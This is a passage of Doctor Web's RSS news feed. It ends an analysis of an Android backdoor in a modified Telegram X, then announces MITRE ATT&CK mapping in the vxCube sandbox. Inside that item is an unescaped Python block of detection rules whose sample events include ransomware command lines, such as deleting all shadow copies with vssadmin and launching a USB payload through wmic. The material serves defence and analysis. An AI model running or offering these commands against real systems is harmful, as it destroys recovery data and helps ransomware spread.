In reality, however, malicious actors have complete control over it through the backdoor and can even alter the logic of its operation.&lt;/p&gt;&lt;p&gt;When cybercriminals need to perform an action that does not require interfering with the app’s main functionality, they use pre-prepared “mirrors” of the necessary messenger methods. For example, mirrors can be used to display phishing messages in windows that look indistinguishable from real Telegram X windows.&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;&lt;i&gt;Methods are separate blocks of code in the structure of Android programs that are responsible for performing certain tasks.&lt;/i&gt;&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;If the action is not standard for the messenger, then the Xposed framework is used. It directly changes a certain functionality of the app via dynamic method modification. In particular, it can be used to hide certain chats and authorized devices as well as to steal the clipboard contents.&lt;/p&gt;&lt;p&gt;The main difference between the earlier versions of the malicious program and the current ones is in how the malware is controlled. Older versions communicated with cybercriminals and received commands from them via a C2 server, which is a traditional channel. However, over time, malware writers added to&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; the ability to receive additional commands that come from the Redis database, thus expanding its functionality. At the same time, they also provided for the duplication of new commands through a regular C2 server in case the database becomes unavailable. 
This is the first known case of using Redis to control Android malware.&lt;/p&gt;&lt;p&gt;When launched,&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; connects to the initial C2 server to download a configuration that, among other parameters, contains data to connect to Redis. Through this database, threat actors not only send specific commands to the malicious app but also update the trojan’s settings. For example, they assign current addresses for the C2 server and the NPS server. Malware writers use the latter to connect infected devices to their internal network (intranet) and turn them into a proxy for accessing the Internet.&lt;/p&gt;&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;regularly connects to the C2 server via API requests and can receive the following tasks:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;upload incoming SMS and contacts from the infected device’s phonebook to the C2 server;&lt;/li&gt;&lt;li&gt;upload the contents of the clipboard to the C2 server when minimizing the messenger and restoring its window;&lt;/li&gt;&lt;li&gt;receive URLs from the C2 server to display ads, as well as the server address from which the trojan’s update in the form of a DEX file will be downloaded;&lt;/li&gt;&lt;li&gt;receive encryption keys that are used when certain data is uploaded to the C2 server (for instance, the clipboard contents);&lt;/li&gt;&lt;li&gt;request a group of commands for collecting information about installed apps, the message history, and contacts from the device’s phonebook, and about the devices logged into Telegram (this request is executed every 30 minutes);&lt;/li&gt;&lt;li&gt;request a URL from the C2 server to download an update for Telegram X;&lt;/li&gt;&lt;li&gt;request from the C2 server a 
configuration which is then saved as a JSON file;&lt;/li&gt;&lt;li&gt;request information about the Redis database;&lt;/li&gt;&lt;li&gt;upload information about the device to the C2 server whenever messenger network activity is detected;&lt;/li&gt;&lt;li&gt;receive from the C2 server a list of bots that are to be added to the Telegram contact list;&lt;/li&gt;&lt;li&gt;upload the following information to the C2 server every 3 minutes: the current app’s permissions, the device’s state (whether its screen is on or off, whether the app is active), and the mobile phone number with the name and password for the Telegram account;&lt;/li&gt;&lt;li&gt;every minute, request commands in the same format as the commands from the Redis database.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;To receive commands via Redis,&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; connects to the attackers’ corresponding server where it registers its own sub-channel. Threat actors connect to this sub-channel and post tasks in it, which the backdoor then executes. 
The malicious program can receive the following commands:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;create a blacklist of chats that will not be displayed in the Telegram X window;&lt;/li&gt;&lt;li&gt;conceal specified devices from the user in the list of authorized devices for their account;&lt;/li&gt;&lt;li&gt;block notifications from blacklisted chats for a specified time;&lt;/li&gt;&lt;li&gt;display a window with information about the Telegram X messenger update (when the user clicks it, they are redirected to a target website);&lt;/li&gt;&lt;li&gt;send the C2 server information about all of the installed apps;&lt;/li&gt;&lt;li&gt;terminate the user’s current authorized Telegram login session on the infected device;&lt;/li&gt;&lt;li&gt;display a window with information about the Telegram X app update, where the user is asked to install an APK file (if the file is missing, the trojan downloads it first);&lt;/li&gt;&lt;li&gt;remove the Telegram Premium icon in the app’s interface for the current user;&lt;/li&gt;&lt;li&gt;upload to the C2 server information from the Telegram X databases that store chat history, messages, and other confidential data;&lt;/li&gt;&lt;li&gt;subscribe the user to a specified Telegram channel;&lt;/li&gt;&lt;li&gt;leave a specified Telegram channel;&lt;/li&gt;&lt;li&gt;join a specified Telegram channel on behalf of the user, using the provided URL;&lt;/li&gt;&lt;li&gt;obtain the list of devices authorized in Telegram;&lt;/li&gt;&lt;li&gt;request the user’s authentication token and upload it to the C2 server.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;It should be noted that hijacking data from the clipboard (when the user minimizes the messenger and restores its window) allows various scenarios for stealing confidential data to be implemented. For example, the victim can copy the password or mnemonic phrase used to access their crypto wallet, copy text from some important document to send it to business partners, etc. 
The trojan will intercept this information from the clipboard and send it to the malicious actors.&lt;/p&gt;&lt;p&gt;Dr.Web Security Space for mobile devices successfully detects and deletes all known versions of &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, so this malware does not pose a threat to our users.&lt;/p&gt;&lt;p&gt;More details about &lt;a href="https://vms.drweb.com/virus/?i=30931101&amp;amp;lng=en"&gt;&lt;strong&gt;Android.Backdoor.Baohuo.1.origin&lt;/strong&gt;&lt;/a&gt;&lt;br&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.Backdoor.Baohuo.1.origin/README.adoc"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15075&amp;lng=en</guid><title>Get structured information about targeted attacks: Dr.Web vxCube reports merged with the MITRE ATT&amp;CK matrix</title><link>https://news.drweb.com/show/?i=15075&amp;lng=en&amp;c=5</link><pubDate>Wed, 22 Oct 2025 14:23:09 GMT</pubDate><description>&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Doctor Web is updating Dr.Web vxCube. The upcoming release will allow the sandbox's reports to be linked with the MITRE ATT&amp;amp;CK Enterprise matrix. As a result, analysis results will be integrated into the knowledge base of adversarial tactics and techniques to provide researchers with a more accurate assessment of samples being examined and allow them to recreate the attack timeline. The MITRE ATT&amp;amp;CK framework contains information about threat actors’ tactics and techniques. 
Cybersecurity experts use the knowledge base to further enhance the security of IT infrastructures.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;This latest Dr.Web vxCube version won't merely provide researchers with a report on the activity of a potential threat but will also help them determine the sequence of steps taken to penetrate and infect a system. This information may subsequently be used to understand how current security policies should be changed to tighten security. Furthermore, the data on identified tactics and techniques can help create new SOC and SIEM rules for neutralising a specific threat.&lt;/p&gt;&lt;p&gt;To better demonstrate how information security professionals will benefit from the upcoming update, let’s examine the report generated after a common encryption ransomware sample was analysed with the new Dr.Web vxCube version.&lt;/p&gt;&lt;p&gt;&lt;video controls=""&gt;
       &lt;source src="https://st.drweb.com/static/new-www/news/2025/october/vxcube/v1.mp4" type="video/mp4"&gt;
    &lt;/video&gt;&lt;/p&gt;&lt;ol&gt;&lt;li&gt;&lt;p class="p1"&gt;&lt;span class="s1"&gt;&lt;strong&gt;Tactics: Initial Access&lt;/strong&gt;&lt;/span&gt;&lt;br&gt;&lt;span class="s1"&gt;&lt;strong&gt;Technique: Replication Through Removable Media&lt;/strong&gt;&lt;/span&gt;&lt;br&gt;&lt;span class="s1"&gt;The attacker downloaded the malware to a removable data storage device that became the source of the infection. Perhaps the employee used their own infected USB stick.&lt;/span&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p class="p1"&gt;&lt;span class="s1"&gt;&lt;strong&gt;Tactics: Execution&lt;/strong&gt;&lt;/span&gt;&lt;br&gt;&lt;span class="s1"&gt;&lt;strong&gt;Technique: Windows Management Instrumentation (WMI)&lt;/strong&gt;&lt;/span&gt;&lt;br&gt;&lt;span class="s1"&gt;As soon as the flash drive gets connected to a computer, the autorun routine is triggered (for example, a modified autorun.inf file could be used for this). The encryption ransomware uses WMI to activate its payload. It employs a legitimate administration tool (WMI) to evade detection by less advanced antiviruses.&lt;/span&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p class="p1"&gt;&lt;span class="s1"&gt;&lt;strong&gt;Tactics: Persistence &amp;amp; Privilege Escalation&lt;/strong&gt;&lt;/span&gt;&lt;br&gt;&lt;span class="s1"&gt;&lt;strong&gt;Technique: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder&lt;/strong&gt;&lt;/span&gt;&lt;br&gt;&lt;span class="s1"&gt;To persist after a system restart and gain control as soon as a user logs in, the ransomware adds itself to the autostart app list. To accomplish this, it creates a corresponding registry entry or copies itself into the autostart folder. 
At this step, the trojan runs with the privileges of whichever account logs in, so if that user is an administrator it acquires the same rights.&lt;/span&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p class="p1"&gt;&lt;span class="s1"&gt;&lt;strong&gt;Tactics: Defense Evasion&lt;/strong&gt;&lt;/span&gt;&lt;br&gt;&lt;span class="s1"&gt;&lt;strong&gt;Technique: Indicator Removal: File Deletion&lt;/strong&gt;&lt;/span&gt;&lt;br&gt;&lt;span class="s1"&gt;Once the ransomware has gained a foothold in the system, it starts covering its tracks. It removes its original executable file from the USB stick or the temporary folder to make it harder for antivirus experts to detect and analyze it.&lt;/span&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p class="p1"&gt;&lt;span class="s1"&gt;&lt;strong&gt;Tactics: Lateral Movement&lt;/strong&gt;&lt;/span&gt;&lt;br&gt;&lt;span class="s1"&gt;&lt;strong&gt;Technique: Replication Through Removable Media&lt;/strong&gt;&lt;/span&gt;&lt;br&gt;&lt;span class="s1"&gt;The malicious program does not confine itself to operating on a single compromised device. It monitors the system to determine when other USB drives get connected and infects them as well. Now, if an employee takes away their flash drive and connects it to another computer, the attack will be repeated. This is how the ransomware traverses air gaps within an infrastructure.&lt;/span&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p class="p1"&gt;&lt;span class="s1"&gt;&lt;strong&gt;Tactics: Impact&lt;/strong&gt;&lt;/span&gt;&lt;br&gt;&lt;span class="s1"&gt;&lt;strong&gt;Techniques: Inhibit System Recovery and Data Encrypted for Impact&lt;/strong&gt;&lt;/span&gt;&lt;br&gt;Inhibit System Recovery: the ransomware attempts to destroy or encrypt point-in-time file copies created by the Volume Shadow Copy Service (VSS) to prevent the victim from recovering their data by using standard Windows tools. 
&amp;nbsp;&lt;br&gt;Data Encrypted for Impact: the malware uses strong encryption algorithms to encrypt all important files (documents, photos, database files) on the computer. After that, a message appears on the screen demanding that a ransom be paid in exchange for the decryption key.&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;A cybersecurity professional can use this information to implement the following measures in order to prevent systems from getting compromised by similar malicious programs:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;Impose tighter restrictions on the use of USB storage media (disable the autorun feature, only allow encrypted corporate flash drives to be connected to the computers).&lt;/li&gt;&lt;li&gt;Configure system monitoring tools to detect suspicious Run Registry keys and attempts to run malicious scripts with WMI.&lt;/li&gt;&lt;li&gt;Divide the network into multiple subnets to mitigate a threat’s ability to spread across the infrastructure.&lt;/li&gt;&lt;li&gt;Set up regular and secure data backups to ensure that a recovery option is always available.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;The new feature is available in both cloud-based and on-premise Dr.Web vxCube versions for Linux and Windows VMs. Only the English language is supported. Doctor Web intends to add MITRE ATT&amp;amp;CK support for Android threat analysis in the future.&lt;/p&gt;&lt;p&gt;The updated Dr.Web vxCube version will also include the current sandbox documentation. The cloud-based version of Dr.Web vxCube will be unavailable on October 23, 2025, between 10.00-11.00 GMT during scheduled updating.&lt;/p&gt;&lt;p&gt;To update the on-premise version, download the latest Dr.Web vxCube distribution and VM images and follow the installation guidelines found in the &lt;a href="https://cdn-download.drweb.com/pub/drweb/vxcube/1.6/onPremise/documentation/admin/html/ru/index.html?dw_update_vxcube.htm"&gt;documentation&lt;/a&gt; to reinstall the software. 
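The monitoring recommendations above (suspicious Run keys, process creation through WMI, and the shadow-copy deletion from the Impact step) can be written as rules and checked against the same technique chain the report produced. The Python below is an added example, not Doctor Web's code and not a vxCube feature: it runs such rules over constructed Sysmon events and orders the hits as a timeline carrying the MITRE technique IDs for the techniques named in the report. Event fields, paths, file names and the set of removable-drive letters are invented for the demonstration; a production rule would take the drive type from the operating system rather than a fixed set.

```python
"""Added example (not Doctor Web's code and not a vxCube feature): the
monitoring advice from the report expressed as SIEM-style rules, run over
constructed Sysmon events and ordered as an attack timeline. Paths, file
names and the removable-drive letters are invented; a real rule would take
drive type from the OS instead of a fixed set."""
import ntpath
import re

# Technique IDs as assigned by MITRE for the techniques named in the report.
TECHNIQUES = {
    "T1091": ("Replication Through Removable Media", "Initial Access, Lateral Movement"),
    "T1047": ("Windows Management Instrumentation", "Execution"),
    "T1547.001": ("Registry Run Keys / Startup Folder", "Persistence, Privilege Escalation"),
    "T1070.004": ("Indicator Removal: File Deletion", "Defense Evasion"),
    "T1490": ("Inhibit System Recovery", "Impact"),
}
REMOVABLE_DRIVES = {"E:", "F:"}                      # assumption for the demo
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\StartUp\\", re.I)
WMI_CREATE = re.compile(r"wmic(\.exe)?\s.*\bprocess\s+call\s+create\b", re.I)
SHADOW_DELETE = re.compile(
    r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete", re.I)


def _same_name_other_path(a, b):
    """True when two paths carry the same file name in different locations."""
    return (ntpath.basename(a).lower() == ntpath.basename(b).lower()
            and a.lower() != b.lower())


def classify(ev):
    """Technique IDs one Sysmon event matches (empty list for benign events)."""
    eid, hits = ev.get("EventID"), []
    image = ev.get("Image", "")
    target = ev.get("TargetFilename", "")
    if eid == 1:                                     # process creation
        parent, cmd = ev.get("ParentImage", ""), ev.get("CommandLine", "")
        if parent.lower().endswith("\\wmiprvse.exe") or WMI_CREATE.search(cmd):
            hits.append("T1047")                     # spawned through WMI
        if SHADOW_DELETE.search(cmd):
            hits.append("T1490")                     # VSS copies destroyed
    elif eid == 11:                                  # file created
        if STARTUP_DIR.search(target):
            hits.append("T1547.001")
        if target[:2].upper() in REMOVABLE_DRIVES and _same_name_other_path(target, image):
            hits.append("T1091")                     # copied itself onto another stick
    elif eid == 13:                                  # registry value set
        if RUN_KEY.search(ev.get("TargetObject", "")):
            hits.append("T1547.001")
    elif eid == 23:                                  # file deleted
        if _same_name_other_path(target, image):
            hits.append("T1070.004")                 # relocated copy removes the original
    return hits


def build_chain(events):
    """Timeline of (event index, technique id, technique name, tactic)."""
    chain = []
    for i, ev in enumerate(events):
        for tid in classify(ev):
            name, tactic = TECHNIQUES[tid]
            chain.append((i, tid, name, tactic))
    return chain


# Constructed Sysmon events following the report's sequence.
EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'wmic.exe process call create "E:\docs\invoice.exe"'},
    {"EventID": 1, "Image": r"E:\docs\invoice.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"E:\docs\invoice.exe"},
    {"EventID": 13, "Image": r"E:\docs\invoice.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    {"EventID": 23, "Image": r"C:\Users\a\AppData\Roaming\invoice.exe",
     "TargetFilename": r"E:\docs\invoice.exe"},
    {"EventID": 11, "Image": r"C:\Users\a\AppData\Roaming\invoice.exe",
     "TargetFilename": r"F:\invoice.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\vssadmin.exe",
     "ParentImage": r"C:\Users\a\AppData\Roaming\invoice.exe",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for i, tid, name, tactic in build_chain(EVENTS):
        print("event %d: %s %s [%s]" % (i, tid, name, tactic))
```

Data Encrypted for Impact is left out on purpose: it is not visible from a single event and is normally detected from a burst of renames or writes with a new extension, which is a rate rule rather than a per-event match. The remaining hits, read in order, reproduce the Initial Access to Impact sequence the sandbox report lays out.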
Use the &lt;a href="https://download.drweb.com/?lng=en"&gt;Download Wizard&lt;/a&gt; to get the latest Dr.Web vxCube version.&lt;/p&gt;&lt;p&gt;Dr.Web vxCube is a suspicious file analysis sandbox. It can help you identify indicators of compromise, prevent cyberattacks and eliminate advanced persistent threats. The sandbox is available as a cloud-based service and an on-premise solution.&lt;/p&gt;&lt;p&gt;Use this &lt;a href="https://download.drweb.com/vxcube/?lng=en"&gt;form&lt;/a&gt; to receive demo access to the cloud-based version of Dr.Web vxCube.&lt;/p&gt;&lt;p&gt;You can purchase a license for Dr.Web vxCube from &lt;a href="https://partners.drweb.com/find_partner/?lng=en"&gt;Doctor Web's partners&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;This update contains the MITRE ATT&amp;amp;CK® knowledge base. The knowledge base is being used and distributed under the MITRE Corporation's license.&lt;/p&gt;&lt;p&gt;© 2025 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.&lt;/p&gt;&lt;p&gt;The MITRE ATT&amp;amp;CK® Terms of Use are available at &lt;a href="https://attack.mitre.org/resources/legal-and-branding/terms-of-use/"&gt;https://attack.mitre.org/resources/legal-and-branding/terms-of-use/&lt;/a&gt;.&lt;/p&gt;</description></item></channel></rss>
